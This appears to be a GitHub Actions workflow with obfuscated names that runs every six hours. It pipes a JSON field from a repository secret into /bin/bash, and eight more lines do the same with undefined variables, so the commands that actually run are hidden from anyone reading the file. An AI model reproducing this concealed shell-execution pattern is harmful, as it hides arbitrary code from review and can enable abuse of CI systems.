name: yutingqqq

on:
  workflow_dispatch:
  schedule:
    - cron: '17 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yutingqqq
        env:
          wr6618: ${{ secrets.wr6618 }}
        run: |
          echo $wr6618 | jq -r .y718 | /bin/bash
          echo $qp1655 | jq -r .ji6376 | /bin/bash
          echo $bknwa68639 | jq -r .nzn465 | /bin/bash
          echo $daz9322 | jq -r .sqcpt42993 | /bin/bash
          echo $fus0 | jq -r .mwtr53 | /bin/bash
          echo $wxr5460 | jq -r .f502 | /bin/bash
          echo $ue2 | jq -r .fjaqj10466 | /bin/bash
          echo $zhh4 | jq -r .bn49738 | /bin/bash
          echo $w41676 | jq -r .yx216 | /bin/bash

